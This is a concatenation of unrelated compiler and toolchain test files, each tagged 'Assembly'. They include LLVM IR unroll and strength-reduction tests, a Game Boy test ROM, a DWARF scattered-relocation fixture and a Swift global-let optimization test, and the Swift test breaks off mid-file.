%a0 = load float, float* %a, align 4
%mul = fmul fast float %a0, %b
%tobool = fcmp une float %mul, 0.000000e+00
br i1 %tobool, label %if.then, label %if.end
if.then: ; preds = %entry
%a1 = load float, float* %a, align 8
%arrayidx1 = getelementptr inbounds float, float* %a, i64 1
%a2 = load float, float* %arrayidx1, align 4
%add = fadd fast float %a1, %a2
br label %if.end
if.end: ; preds = %if.then, %entry
%storemerge = phi float [ %add, %if.then ], [ 1.000000e+00, %entry ]
ret float %storemerge
}
; CHECK-LABEL: @boo
; CHECK-NOT: call float @foo
define float @boo(float* %a) {
entry:
%call = call float @foo(float* %a, float 0.000000e+00)
ret float %call
}
| {
"language": "Assembly"
} |
( ixy+- HL rd )
: LDIXYr,
( dd/fd has already been spit )
LDrr, ( ixy+- )
A,
;
( rd ixy+- HL )
: LDrIXY,
ROT ( ixy+- HL rd )
SWAP ( ixy+- rd HL )
LDIXYr,
;
| {
"language": "Assembly"
} |
// ---------------------------------------------------------------------
//
// Copyright (C) 2013 - 2019 by the deal.II authors
//
// This file is part of the deal.II library.
//
// The deal.II library is free software; you can use it, redistribute
// it, and/or modify it under the terms of the GNU Lesser General
// Public License as published by the Free Software Foundation; either
// version 2.1 of the License, or (at your option) any later version.
// The full text of the license can be found in the file LICENSE.md at
// the top level directory of deal.II.
//
// ---------------------------------------------------------------------
for (S : VECTOR_TYPES)
{
template class SolverBase<S>;
}
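// (This stanza is expanded by deal.II's instantiation machinery for
// .inst.in files: S ranges over the vector types enabled at configure
// time, e.g. Vector<double>; the exact list depends on the build.)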
| {
"language": "Assembly"
} |
.size 8000
.text@48
jp ff80
.text@100
jp lbegin
.data@143
80
.text@200
ld sp, fea1
ld hl, aa55
push hl
ld a, ef
ldff(46), a
ld c, 27
lwaitdma:
dec c
jrnz lwaitdma
pop de
ld a, (fe9d)
ld c, a
ld a, (fe9e)
ld b, a
ld sp, cfff
push de
push bc
jp lprint4
.text@150
lbegin:
ld bc, 0200
ld hl, ff80
ld d, 40
lcopydmaroutine:
ld a, (bc)
ld(hl++), a
inc c
dec d
jrnz lcopydmaroutine
ld b, 90
call lwaitly_b
ld bc, fe00
ld d, a0
ld a, 06
lfill_oam:
ld(bc), a
inc c
dec d
jrnz lfill_oam
ld hl, ef98
ld d, 08
ld a, 10
ld b, 11
lfill_wram:
ld(hl++), a
add a, b
dec d
jrnz lfill_wram
ld a, 90
ldff(45), a
ld a, 40
ldff(41), a
xor a, a
ldff(0f), a
ld a, 02
ldff(ff), a
ei
halt
.text@7000
lprint4:
ld b, 90
call lwaitly_b
xor a, a
ldff(40), a
ld bc, 7a00
ld hl, 8000
ld d, 00
lprint_copytiles:
ld a, (bc)
inc bc
ld(hl++), a
dec d
jrnz lprint_copytiles
ld hl, 9800
ld d, 02
lprint_settiles:
pop bc
ld a, c
srl a
srl a
srl a
srl a
ld(hl++), a
ld a, c
and a, 0f
ld(hl++), a
ld a, b
srl a
srl a
srl a
srl a
ld(hl++), a
ld a, b
and a, 0f
ld(hl++), a
dec d
jrnz lprint_settiles
ld a, c0
ldff(47), a
ld a, 80
ldff(68), a
ld a, ff
ldff(69), a
ldff(69), a
ldff(69), a
ldff(69), a
ldff(69), a
ldff(69), a
xor a, a
ldff(69), a
ldff(69), a
ldff(43), a
ld a, 91
ldff(40), a
lprint_limbo:
jr lprint_limbo
.text@7400
lwaitly_b:
ld c, 44
lwaitly_b_loop:
ldff a, (c)
cmp a, b
jrnz lwaitly_b_loop
ret
.data@7a00
00 00 7f 7f 41 41 41 41
41 41 41 41 41 41 7f 7f
00 00 08 08 08 08 08 08
08 08 08 08 08 08 08 08
00 00 7f 7f 01 01 01 01
7f 7f 40 40 40 40 7f 7f
00 00 7f 7f 01 01 01 01
3f 3f 01 01 01 01 7f 7f
00 00 41 41 41 41 41 41
7f 7f 01 01 01 01 01 01
00 00 7f 7f 40 40 40 40
7e 7e 01 01 01 01 7e 7e
00 00 7f 7f 40 40 40 40
7f 7f 41 41 41 41 7f 7f
00 00 7f 7f 01 01 02 02
04 04 08 08 10 10 10 10
00 00 3e 3e 41 41 41 41
3e 3e 41 41 41 41 3e 3e
00 00 7f 7f 41 41 41 41
7f 7f 01 01 01 01 7f 7f
00 00 08 08 22 22 41 41
7f 7f 41 41 41 41 41 41
00 00 7e 7e 41 41 41 41
7e 7e 41 41 41 41 7e 7e
00 00 3e 3e 41 41 40 40
40 40 40 40 41 41 3e 3e
00 00 7e 7e 41 41 41 41
41 41 41 41 41 41 7e 7e
00 00 7f 7f 40 40 40 40
7f 7f 40 40 40 40 7f 7f
00 00 7f 7f 40 40 40 40
7f 7f 40 40 40 40 40 40
| {
"language": "Assembly"
} |
; RUN: llc -mtriple=arm-eabi %s -o - | FileCheck %s
; This loop is rewritten with an indvar which counts down, which
; frees up a register from holding the trip count.
define void @test(i32* %P, i32 %A, i32 %i) nounwind {
entry:
; CHECK: str r1, [{{r.*}}, {{r.*}}, lsl #2]
icmp eq i32 %i, 0 ; <i1>:0 [#uses=1]
br i1 %0, label %return, label %bb
bb: ; preds = %bb, %entry
%indvar = phi i32 [ 0, %entry ], [ %indvar.next, %bb ] ; <i32> [#uses=2]
%i_addr.09.0 = sub i32 %i, %indvar ; <i32> [#uses=1]
%tmp2 = getelementptr i32* %P, i32 %i_addr.09.0 ; <i32*> [#uses=1]
store i32 %A, i32* %tmp2
%indvar.next = add i32 %indvar, 1 ; <i32> [#uses=2]
icmp eq i32 %indvar.next, %i ; <i1>:1 [#uses=1]
br i1 %1, label %return, label %bb
return: ; preds = %bb, %entry
ret void
}
; This loop has a non-address use of the count-up indvar, so
; it'll remain. Now the original store uses a negative-stride address.
define void @test_with_forced_iv(i32* %P, i32 %A, i32 %i) nounwind {
entry:
; CHECK: str r1, [{{r.*}}, -{{r.*}}, lsl #2]
icmp eq i32 %i, 0 ; <i1>:0 [#uses=1]
br i1 %0, label %return, label %bb
bb: ; preds = %bb, %entry
%indvar = phi i32 [ 0, %entry ], [ %indvar.next, %bb ] ; <i32> [#uses=2]
%i_addr.09.0 = sub i32 %i, %indvar ; <i32> [#uses=1]
%tmp2 = getelementptr i32* %P, i32 %i_addr.09.0 ; <i32*> [#uses=1]
store i32 %A, i32* %tmp2
store i32 %indvar, i32* null
%indvar.next = add i32 %indvar, 1 ; <i32> [#uses=2]
icmp eq i32 %indvar.next, %i ; <i1>:1 [#uses=1]
br i1 %1, label %return, label %bb
return: ; preds = %bb, %entry
ret void
}
| {
"language": "Assembly"
} |
# REQUIRES: rar_binary
# Remove old temporary working directory
# RUN: rm -rf %t
# RUN: mkdir -p %t
# RUN: cd %t
# RUN: mkdir a
# RUN: echo "Test file" > test_file
# RUN: %rar a a/test.rar test_file
# RUN: test -f a/test.rar
# RUN: rm test_file
# RUN: mkdir b
# RUN: echo "Test file 2" > test_file_2
# RUN: %rar a b/test.rar test_file_2
# RUN: test -f b/test.rar
# RUN: rm test_file_2
# Check the test files are extracted to the correct location and the rar files
# are removed.
# RUN: %unrarall --clean=rar .
# RUN: test -f a/test_file
# RUN: test -f b/test_file_2
# RUN: test ! -f a/test.rar
# RUN: test ! -f b/test.rar
| {
"language": "Assembly"
} |
; RUN: opt < %s -loop-unroll -S | FileCheck %s
; RUN: opt < %s -loop-unroll -loop-unroll -S | FileCheck %s
;
; Run loop unrolling twice to verify that loop unrolling metadata is properly
; removed and further unrolling is disabled after the pass is run once.
target datalayout = "e-m:e-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"
; loop4 contains a small loop which should be completely unrolled by
; the default unrolling heuristics. It serves as a control for the
; unroll(disable) pragma test loop4_with_disable.
;
; CHECK-LABEL: @loop4(
; CHECK-NOT: br i1
define void @loop4(i32* nocapture %a) {
entry:
br label %for.body
for.body: ; preds = %for.body, %entry
%indvars.iv = phi i64 [ 0, %entry ], [ %indvars.iv.next, %for.body ]
%arrayidx = getelementptr inbounds i32* %a, i64 %indvars.iv
%0 = load i32* %arrayidx, align 4
%inc = add nsw i32 %0, 1
store i32 %inc, i32* %arrayidx, align 4
%indvars.iv.next = add nuw nsw i64 %indvars.iv, 1
%exitcond = icmp eq i64 %indvars.iv.next, 4
br i1 %exitcond, label %for.end, label %for.body
for.end: ; preds = %for.body
ret void
}
; #pragma clang loop unroll(disable)
;
; CHECK-LABEL: @loop4_with_disable(
; CHECK: store i32
; CHECK-NOT: store i32
; CHECK: br i1
define void @loop4_with_disable(i32* nocapture %a) {
entry:
br label %for.body
for.body: ; preds = %for.body, %entry
%indvars.iv = phi i64 [ 0, %entry ], [ %indvars.iv.next, %for.body ]
%arrayidx = getelementptr inbounds i32* %a, i64 %indvars.iv
%0 = load i32* %arrayidx, align 4
%inc = add nsw i32 %0, 1
store i32 %inc, i32* %arrayidx, align 4
%indvars.iv.next = add nuw nsw i64 %indvars.iv, 1
%exitcond = icmp eq i64 %indvars.iv.next, 4
br i1 %exitcond, label %for.end, label %for.body, !llvm.loop !1
for.end: ; preds = %for.body
ret void
}
!1 = !{!1, !2}
!2 = !{!"llvm.loop.unroll.disable"}
; loop64 has a high enough count that it should *not* be unrolled by
; the default unrolling heuristic. It serves as the control for the
; unroll(full) pragma test loop64_with_.* tests below.
;
; CHECK-LABEL: @loop64(
; CHECK: store i32
; CHECK-NOT: store i32
; CHECK: br i1
define void @loop64(i32* nocapture %a) {
entry:
br label %for.body
for.body: ; preds = %for.body, %entry
%indvars.iv = phi i64 [ 0, %entry ], [ %indvars.iv.next, %for.body ]
%arrayidx = getelementptr inbounds i32* %a, i64 %indvars.iv
%0 = load i32* %arrayidx, align 4
%inc = add nsw i32 %0, 1
store i32 %inc, i32* %arrayidx, align 4
%indvars.iv.next = add nuw nsw i64 %indvars.iv, 1
%exitcond = icmp eq i64 %indvars.iv.next, 64
br i1 %exitcond, label %for.end, label %for.body
for.end: ; preds = %for.body
ret void
}
; #pragma clang loop unroll(full)
; Loop should be fully unrolled.
;
; CHECK-LABEL: @loop64_with_enable(
; CHECK-NOT: br i1
define void @loop64_with_enable(i32* nocapture %a) {
entry:
br label %for.body
for.body: ; preds = %for.body, %entry
%indvars.iv = phi i64 [ 0, %entry ], [ %indvars.iv.next, %for.body ]
%arrayidx = getelementptr inbounds i32* %a, i64 %indvars.iv
%0 = load i32* %arrayidx, align 4
%inc = add nsw i32 %0, 1
store i32 %inc, i32* %arrayidx, align 4
%indvars.iv.next = add nuw nsw i64 %indvars.iv, 1
%exitcond = icmp eq i64 %indvars.iv.next, 64
br i1 %exitcond, label %for.end, label %for.body, !llvm.loop !3
for.end: ; preds = %for.body
ret void
}
!3 = !{!3, !4}
!4 = !{!"llvm.loop.unroll.full"}
; #pragma clang loop unroll_count(4)
; Loop should be unrolled 4 times.
;
; CHECK-LABEL: @loop64_with_count4(
; CHECK: store i32
; CHECK: store i32
; CHECK: store i32
; CHECK: store i32
; CHECK-NOT: store i32
; CHECK: br i1
define void @loop64_with_count4(i32* nocapture %a) {
entry:
br label %for.body
for.body: ; preds = %for.body, %entry
%indvars.iv = phi i64 [ 0, %entry ], [ %indvars.iv.next, %for.body ]
%arrayidx = getelementptr inbounds i32* %a, i64 %indvars.iv
%0 = load i32* %arrayidx, align 4
%inc = add nsw i32 %0, 1
store i32 %inc, i32* %arrayidx, align 4
%indvars.iv.next = add nuw nsw i64 %indvars.iv, 1
%exitcond = icmp eq i64 %indvars.iv.next, 64
br i1 %exitcond, label %for.end, label %for.body, !llvm.loop !5
for.end: ; preds = %for.body
ret void
}
!5 = !{!5, !6}
!6 = !{!"llvm.loop.unroll.count", i32 4}
; #pragma clang loop unroll(full)
; Full unrolling is requested, but loop has a dynamic trip count so
; no unrolling should occur.
;
; CHECK-LABEL: @dynamic_loop_with_enable(
; CHECK: store i32
; CHECK-NOT: store i32
; CHECK: br i1
define void @dynamic_loop_with_enable(i32* nocapture %a, i32 %b) {
entry:
%cmp3 = icmp sgt i32 %b, 0
br i1 %cmp3, label %for.body, label %for.end, !llvm.loop !8
for.body: ; preds = %entry, %for.body
%indvars.iv = phi i64 [ %indvars.iv.next, %for.body ], [ 0, %entry ]
%arrayidx = getelementptr inbounds i32* %a, i64 %indvars.iv
%0 = load i32* %arrayidx, align 4
%inc = add nsw i32 %0, 1
store i32 %inc, i32* %arrayidx, align 4
%indvars.iv.next = add nuw nsw i64 %indvars.iv, 1
%lftr.wideiv = trunc i64 %indvars.iv.next to i32
%exitcond = icmp eq i32 %lftr.wideiv, %b
br i1 %exitcond, label %for.end, label %for.body, !llvm.loop !8
for.end: ; preds = %for.body, %entry
ret void
}
!8 = !{!8, !4}
; #pragma clang loop unroll_count(4)
; Loop has a dynamic trip count. Unrolling should occur, but no
; conditional branches can be removed.
;
; CHECK-LABEL: @dynamic_loop_with_count4(
; CHECK-NOT: store
; CHECK: br i1
; CHECK: store
; CHECK: br i1
; CHECK: store
; CHECK: br i1
; CHECK: store
; CHECK: br i1
; CHECK: store
; CHECK: br i1
; CHECK-NOT: br i1
define void @dynamic_loop_with_count4(i32* nocapture %a, i32 %b) {
entry:
%cmp3 = icmp sgt i32 %b, 0
br i1 %cmp3, label %for.body, label %for.end, !llvm.loop !9
for.body: ; preds = %entry, %for.body
%indvars.iv = phi i64 [ %indvars.iv.next, %for.body ], [ 0, %entry ]
%arrayidx = getelementptr inbounds i32* %a, i64 %indvars.iv
%0 = load i32* %arrayidx, align 4
%inc = add nsw i32 %0, 1
store i32 %inc, i32* %arrayidx, align 4
%indvars.iv.next = add nuw nsw i64 %indvars.iv, 1
%lftr.wideiv = trunc i64 %indvars.iv.next to i32
%exitcond = icmp eq i32 %lftr.wideiv, %b
br i1 %exitcond, label %for.end, label %for.body, !llvm.loop !9
for.end: ; preds = %for.body, %entry
ret void
}
!9 = !{!9, !6}
; #pragma clang loop unroll_count(1)
; Loop should not be unrolled
;
; CHECK-LABEL: @unroll_1(
; CHECK: store i32
; CHECK-NOT: store i32
; CHECK: br i1
define void @unroll_1(i32* nocapture %a, i32 %b) {
entry:
br label %for.body
for.body: ; preds = %for.body, %entry
%indvars.iv = phi i64 [ 0, %entry ], [ %indvars.iv.next, %for.body ]
%arrayidx = getelementptr inbounds i32* %a, i64 %indvars.iv
%0 = load i32* %arrayidx, align 4
%inc = add nsw i32 %0, 1
store i32 %inc, i32* %arrayidx, align 4
%indvars.iv.next = add nuw nsw i64 %indvars.iv, 1
%exitcond = icmp eq i64 %indvars.iv.next, 4
br i1 %exitcond, label %for.end, label %for.body, !llvm.loop !10
for.end: ; preds = %for.body
ret void
}
!10 = !{!10, !11}
!11 = !{!"llvm.loop.unroll.count", i32 1}
; #pragma clang loop unroll(full)
; Loop has very high loop count (1 million) and full unrolling was requested.
; Loop should unrolled up to the pragma threshold, but not completely.
;
; CHECK-LABEL: @unroll_1M(
; CHECK: store i32
; CHECK: store i32
; CHECK: br i1
define void @unroll_1M(i32* nocapture %a, i32 %b) {
entry:
br label %for.body
for.body: ; preds = %for.body, %entry
%indvars.iv = phi i64 [ 0, %entry ], [ %indvars.iv.next, %for.body ]
%arrayidx = getelementptr inbounds i32* %a, i64 %indvars.iv
%0 = load i32* %arrayidx, align 4
%inc = add nsw i32 %0, 1
store i32 %inc, i32* %arrayidx, align 4
%indvars.iv.next = add nuw nsw i64 %indvars.iv, 1
%exitcond = icmp eq i64 %indvars.iv.next, 1000000
br i1 %exitcond, label %for.end, label %for.body, !llvm.loop !12
for.end: ; preds = %for.body
ret void
}
!12 = !{!12, !4}
| {
"language": "Assembly"
} |
# This assembly file was generated from the following trivial C code:
# $ cat scattered.c
# int bar = 42;
# $ clang -S -arch armv7 -g scattered.c
# $ clang -c -o 1.o scattered.s
#
# Then I edited the debug info below to change the DW_AT_location of the
# variable from '.long _bar' to '.long _bar + 16' in order to generate a
# scattered reloc (I do not think LLVM will generate scattered relocs in
# debug info by itself).
.section __TEXT,__text,regular,pure_instructions
.ios_version_min 5, 0
.syntax unified
.file 1 "scattered.c"
.section __DATA,__data
.globl _bar @ @bar
.p2align 2
_bar:
.long 42 @ 0x2a
.section __DWARF,__debug_str,regular,debug
Linfo_string:
.asciz "clang version 3.9.0 (trunk 259311)" @ string offset=0
.asciz "scattered.c" @ string offset=35
.asciz "/tmp" @ string offset=47
.asciz "bar" @ string offset=52
.asciz "int" @ string offset=56
.section __DWARF,__debug_loc,regular,debug
Lsection_debug_loc:
.section __DWARF,__debug_abbrev,regular,debug
Lsection_abbrev:
.byte 1 @ Abbreviation Code
.byte 17 @ DW_TAG_compile_unit
.byte 1 @ DW_CHILDREN_yes
.byte 37 @ DW_AT_producer
.byte 14 @ DW_FORM_strp
.byte 19 @ DW_AT_language
.byte 5 @ DW_FORM_data2
.byte 3 @ DW_AT_name
.byte 14 @ DW_FORM_strp
.byte 16 @ DW_AT_stmt_list
.byte 6 @ DW_FORM_data4
.byte 27 @ DW_AT_comp_dir
.byte 14 @ DW_FORM_strp
.byte 0 @ EOM(1)
.byte 0 @ EOM(2)
.byte 2 @ Abbreviation Code
.byte 52 @ DW_TAG_variable
.byte 0 @ DW_CHILDREN_no
.byte 3 @ DW_AT_name
.byte 14 @ DW_FORM_strp
.byte 73 @ DW_AT_type
.byte 19 @ DW_FORM_ref4
.byte 63 @ DW_AT_external
.byte 12 @ DW_FORM_flag
.byte 58 @ DW_AT_decl_file
.byte 11 @ DW_FORM_data1
.byte 59 @ DW_AT_decl_line
.byte 11 @ DW_FORM_data1
.byte 2 @ DW_AT_location
.byte 10 @ DW_FORM_block1
.byte 0 @ EOM(1)
.byte 0 @ EOM(2)
.byte 3 @ Abbreviation Code
.byte 36 @ DW_TAG_base_type
.byte 0 @ DW_CHILDREN_no
.byte 3 @ DW_AT_name
.byte 14 @ DW_FORM_strp
.byte 62 @ DW_AT_encoding
.byte 11 @ DW_FORM_data1
.byte 11 @ DW_AT_byte_size
.byte 11 @ DW_FORM_data1
.byte 0 @ EOM(1)
.byte 0 @ EOM(2)
.byte 0 @ EOM(3)
.section __DWARF,__debug_info,regular,debug
Lsection_info:
Lcu_begin0:
.long 52 @ Length of Unit
.short 2 @ DWARF version number
Lset0 = Lsection_abbrev-Lsection_abbrev @ Offset Into Abbrev. Section
.long Lset0
.byte 4 @ Address Size (in bytes)
.byte 1 @ Abbrev [1] 0xb:0x2d DW_TAG_compile_unit
.long 0 @ DW_AT_producer
.short 12 @ DW_AT_language
.long 35 @ DW_AT_name
Lset1 = Lline_table_start0-Lsection_line @ DW_AT_stmt_list
.long Lset1
.long 47 @ DW_AT_comp_dir
.byte 2 @ Abbrev [2] 0x1e:0x12 DW_TAG_variable
.long 52 @ DW_AT_name
.long 48 @ DW_AT_type
.byte 1 @ DW_AT_external
.byte 1 @ DW_AT_decl_file
.byte 1 @ DW_AT_decl_line
.byte 5 @ DW_AT_location
.byte 3
.long _bar + 16
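	@ hand-edited (was '.long _bar'): the +16 addend is what
	@ produces the scattered relocation described in the header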
.byte 3 @ Abbrev [3] 0x30:0x7 DW_TAG_base_type
.long 56 @ DW_AT_name
.byte 5 @ DW_AT_encoding
.byte 4 @ DW_AT_byte_size
.byte 0 @ End Of Children Mark
.section __DWARF,__debug_ranges,regular,debug
Ldebug_range:
.section __DWARF,__debug_macinfo,regular,debug
.byte 0 @ End Of Macro List Mark
.section __DWARF,__apple_names,regular,debug
Lnames_begin:
.long 1212240712 @ Header Magic
.short 1 @ Header Version
.short 0 @ Header Hash Function
.long 1 @ Header Bucket Count
.long 1 @ Header Hash Count
.long 12 @ Header Data Length
.long 0 @ HeaderData Die Offset Base
.long 1 @ HeaderData Atom Count
.short 1 @ DW_ATOM_die_offset
.short 6 @ DW_FORM_data4
.long 0 @ Bucket 0
.long 193487034 @ Hash in Bucket 0
.long LNames0-Lnames_begin @ Offset in Bucket 0
LNames0:
.long 52 @ bar
.long 1 @ Num DIEs
.long 30
.long 0
.section __DWARF,__apple_objc,regular,debug
Lobjc_begin:
.long 1212240712 @ Header Magic
.short 1 @ Header Version
.short 0 @ Header Hash Function
.long 1 @ Header Bucket Count
.long 0 @ Header Hash Count
.long 12 @ Header Data Length
.long 0 @ HeaderData Die Offset Base
.long 1 @ HeaderData Atom Count
.short 1 @ DW_ATOM_die_offset
.short 6 @ DW_FORM_data4
.long -1 @ Bucket 0
.section __DWARF,__apple_namespac,regular,debug
Lnamespac_begin:
.long 1212240712 @ Header Magic
.short 1 @ Header Version
.short 0 @ Header Hash Function
.long 1 @ Header Bucket Count
.long 0 @ Header Hash Count
.long 12 @ Header Data Length
.long 0 @ HeaderData Die Offset Base
.long 1 @ HeaderData Atom Count
.short 1 @ DW_ATOM_die_offset
.short 6 @ DW_FORM_data4
.long -1 @ Bucket 0
.section __DWARF,__apple_types,regular,debug
Ltypes_begin:
.long 1212240712 @ Header Magic
.short 1 @ Header Version
.short 0 @ Header Hash Function
.long 1 @ Header Bucket Count
.long 1 @ Header Hash Count
.long 20 @ Header Data Length
.long 0 @ HeaderData Die Offset Base
.long 3 @ HeaderData Atom Count
.short 1 @ DW_ATOM_die_offset
.short 6 @ DW_FORM_data4
.short 3 @ DW_ATOM_die_tag
.short 5 @ DW_FORM_data2
.short 4 @ DW_ATOM_type_flags
.short 11 @ DW_FORM_data1
.long 0 @ Bucket 0
.long 193495088 @ Hash in Bucket 0
.long Ltypes0-Ltypes_begin @ Offset in Bucket 0
Ltypes0:
.long 56 @ int
.long 1 @ Num DIEs
.long 48
.short 36
.byte 0
.long 0
.subsections_via_symbols
.section __DWARF,__debug_line,regular,debug
Lsection_line:
Lline_table_start0:
| {
"language": "Assembly"
} |
// RUN: %target-swift-frontend -O -emit-sil -primary-file %s | %FileCheck %s
// Check that values of static let and global let variables are propagated into their uses,
// enabling further optimizations like constant propagation, simplification, etc.
// Define some global let variables.
// Currently GlobalOpt cannot deal with the new alloc_global instruction.
let PI = 3.1415
let ONE = 1.000
let I = 100
let J = 200
let S = "String1"
let VOLUME1 = I * J
let VOLUME2 = J * 2
let VOLUME3 = I + 10
struct IntWrapper1 {
let val: Int
}
struct IntWrapper2 {
let val: IntWrapper1
}
struct IntWrapper3 {
let val: IntWrapper2
}
struct IntWrapper4 {
let val: IntWrapper2
let val2: IntWrapper1
}
// Test with an initializer, where a SIL debug_value instruction might block
// analysis of the initializer and inhibit optimization of the let.
struct IntWrapper5 {
let val: Int
init(val: Int) { self.val = val }
static let Five = IntWrapper5(val: 5)
}
var PROP1: Double {
return PI
}
var PROP2: Int {
return I * J - I
}
var VPI = 3.1415
var VI = 100
var VS = "String2"
// Define some static let variables inside a struct.
struct B {
static let PI = 3.1415
static let ONE = 1.000
static let I = 100
static let J = 200
static let S1 = "String3"
static let VOLUME1 = I * J
static let VOLUME2 = J * 2
static let VOLUME3 = I + 10
static var PROP1: Double {
return PI
}
static var PROP2: Int {
return I * J - I
}
static func foo() {}
static let IW3 = IntWrapper3(val: IntWrapper2(val: IntWrapper1(val: 10)))
static let IW4 = IntWrapper4(val: IntWrapper2(val: IntWrapper1(val: 10)), val2: IntWrapper1(val: 100))
static let IT1 = ((10, 20), 30, 40)
static let IT2 = (100, 200, 300)
}
// Define some static let variables inside a class.
class C {
static let PI = 3.1415
static let ONE = 1.000
static let I = 100
static let J = 200
static let S1 = "String3"
static let VOLUME1 = I * J
static let VOLUME2 = J * 2
static let VOLUME3 = I + 10
static var PROP1: Double {
return PI
}
static var PROP2: Int {
return I * J - I
}
static func foo() {}
static let IW3 = IntWrapper3(val: IntWrapper2(val: IntWrapper1(val: 10)))
static let IW4 = IntWrapper4(val: IntWrapper2(val: IntWrapper1(val: 10)), val2: IntWrapper1(val: 100))
static let IT1 = ((10, 20), 30, 40)
static let IT2 = (100, 200, 300)
}
// CHECK-LABEL: sil [noinline] @_T025globalopt_let_propagation05test_B7_doubleSdyF
// CHECK: bb0:
// CHECK-NEXT: float_literal
// CHECK-NEXT: struct
// CHECK: return
@inline(never)
public func test_let_double() -> Double {
return PI + 1.0
}
// CHECK-LABEL: sil [noinline] @_T025globalopt_let_propagation05test_B4_intSiyF
// CHECK: bb0:
// CHECK-NEXT: integer_literal
// CHECK-NEXT: struct
// CHECK: return
@inline(never)
public func test_let_int() -> Int {
return I + 1
}
@inline(never)
public func test_let_string() -> String {
return S
}
// CHECK-LABEL: sil [noinline] @_T025globalopt_let_propagation05test_B15_double_complexSdyF
// CHECK: bb0:
// CHECK-NEXT: float_literal
// CHECK-NEXT: struct
// CHECK: return
@inline(never)
public func test_let_double_complex() -> Double {
return PI + ONE + PROP1
}
// CHECK-LABEL: sil [noinline] @_T025globalopt_let_propagation05test_B12_int_complexSiyF
// CHECK: bb0:
// CHECK-NEXT: integer_literal
// CHECK-NEXT: struct
// CHECK: return
@inline(never)
public func test_let_int_complex() -> Int {
return I + J + VOLUME1 + VOLUME2 + VOLUME3 + PROP2
}
// CHECK-LABEL: sil [noinline] @_T025globalopt_let_propagation019test_static_struct_B7_doubleSdyF
// CHECK: bb0:
// CHECK-NEXT: float_literal
// CHECK-NEXT: struct
// CHECK: return
@inline(never)
public func test_static_struct_let_double() -> Double {
return B.PI + 1.0
}
// CHECK-LABEL: sil [noinline] @_T025globalopt_let_propagation019test_static_struct_B4_intSiyF
// CHECK: bb0:
// CHECK-NEXT: integer_literal
// CHECK-NEXT: struct
// CHECK: return
@inline(never)
public func test_static_struct_let_int() -> Int {
return B.I + 1
}
@inline(never)
public func test_static_struct_let_string() -> String {
return B.S1
}
// CHECK-LABEL: sil [noinline] @_T025globalopt_let_propagation019test_static_struct_B15_double_complexSdyF
// CHECK: bb0:
// CHECK-NEXT: float_literal
// CHECK-NEXT: struct
// CHECK: return
@inline(never)
public func test_static_struct_let_double_complex() -> Double {
return B.PI + B.ONE + B.PROP1
}
// CHECK-LABEL: sil [noinline] @_T025globalopt_let_propagation019test_static_struct_B12_int_complexSiyF
// CHECK: bb0:
// CHECK-NEXT: integer_literal
// CHECK-NEXT: struct
// CHECK: return
@inline(never)
public func test_static_struct_let_int_complex() -> Int {
return B.I + B.J + B.VOLUME1 + B.VOLUME2 + B.VOLUME3 + B.PROP2
}
// CHECK-LABEL: sil [noinline] @_T025globalopt_let_propagation018test_static_class_B7_doubleSdyF
// CHECK: bb0:
// CHECK-NEXT: float_literal
// CHECK-NEXT: struct
// CHECK: return
@inline(never)
public func test_static_class_let_double() -> Double {
return C.PI + 1.0
}
// CHECK-LABEL: sil [noinline] @_T025globalopt_let_propagation018test_static_class_B4_intSiyF
// CHECK: bb0:
// CHECK-NEXT: integer_literal
// CHECK-NEXT: struct
// CHECK: return
@inline(never)
public func test_static_class_let_int() -> Int {
return C.I + 1
}
@inline(never)
public func test_static_class_let_string() -> String {
return C.S1
}
// CHECK-LABEL: sil [noinline] @_T025globalopt_let_propagation018test_static_class_B15_double_complexSdyF
// CHECK: bb0:
// CHECK-NEXT: float_literal
// CHECK-NEXT: struct
// CHECK: return
@inline(never)
public func test_static_class_let_double_complex() -> Double {
return C.PI + C.ONE + C.PROP1
}
// CHECK-LABEL: sil [noinline] @_T025globalopt_let_propagation018test_static_class_B12_int_complexSiyF
// CHECK: bb0:
// CHECK-NEXT: integer_literal
// CHECK-NEXT: struct
// CHECK: return
@inline(never)
public func test_static_class_let_int_complex() -> Int {
return C.I + C.J + C.VOLUME1 + C.VOLUME2 + C.VOLUME3 + C.PROP2
}
// CHECK-LABEL: sil [noinline] @_T025globalopt_let_propagation15test_var_doubleSdyF
// CHECK: bb0:
// CHECK-NEXT: global_addr
// CHECK-NEXT: struct_element_addr
// CHECK-NEXT: load
@inline(never)
public func test_var_double() -> Double {
return VPI + 1.0
}
// CHECK-LABEL: sil [noinline] @_T025globalopt_let_propagation12test_var_intSiyF
// CHECK: bb0:
// CHECK-NEXT: global_addr
// CHECK-NEXT: struct_element_addr
// CHECK-NEXT: load
@inline(never)
public func test_var_int() -> Int {
return VI + 1
}
// CHECK-LABEL: sil [noinline] @_T025globalopt_let_propagation018test_static_class_B12_wrapped_intSiyF
// CHECK: bb0:
// CHECK-NEXT: integer_literal
// CHECK-NEXT: struct
// CHECK: return
@inline(never)
public func test_static_class_let_wrapped_int() -> Int {
return C.IW3.val.val.val + 1
}
// CHECK-LABEL: sil [noinline] @_T025globalopt_let_propagation019test_static_struct_B12_wrapped_intSiyF
// CHECK: bb0:
// CHECK-NEXT: integer_literal
// CHECK-NEXT: struct
// CHECK: return
@inline(never)
public func test_static_struct_let_wrapped_int() -> Int {
return B.IW3.val.val.val + 1
}
// Test accessing multiple Int fields wrapped into multiple structs, where each struct may have
// multiple fields.
// CHECK-LABEL: sil [noinline] @_T025globalopt_let_propagation019test_static_struct_b1_F22_wrapped_multiple_intsSiyF
// CHECK: bb0:
// CHECK-NOT: global_addr
// CHECK: integer_literal
// CHECK-NOT: global_addr
// CHECK: struct
// CHECK: return
@inline(never)
public func test_static_struct_let_struct_wrapped_multiple_ints() -> Int {
return B.IW4.val.val.val + B.IW4.val2.val + IntWrapper5.Five.val + 1
}
// Test accessing multiple Int fields wrapped into multiple structs, where each struct may have
// multiple fields.
// CHECK-LABEL: sil [noinline] @_T025globalopt_let_propagation018test_static_class_B29_struct_wrapped_multiple_intsSiyF
// CHECK: bb0:
// CHECK-NOT: global_addr
// CHECK: integer_literal
// CHECK-NOT: global_addr
// CHECK: struct
// CHECK: return
@inline(never)
public func test_static_class_let_struct_wrapped_multiple_ints() -> Int {
return C.IW4.val.val.val + C.IW4.val2.val + IntWrapper5.Five.val + 1
}
// Test accessing multiple Int fields wrapped into multiple tuples, where each tuple may have
// multiple fields.
// CHECK-LABEL: sil [noinline] @_T025globalopt_let_propagation019test_static_struct_B19_tuple_wrapped_intsSiyF
// CHECK: bb0:
// CHECK-NOT: global_addr
// CHECK: integer_literal
// CHECK: struct
// CHECK: return
@inline(never)
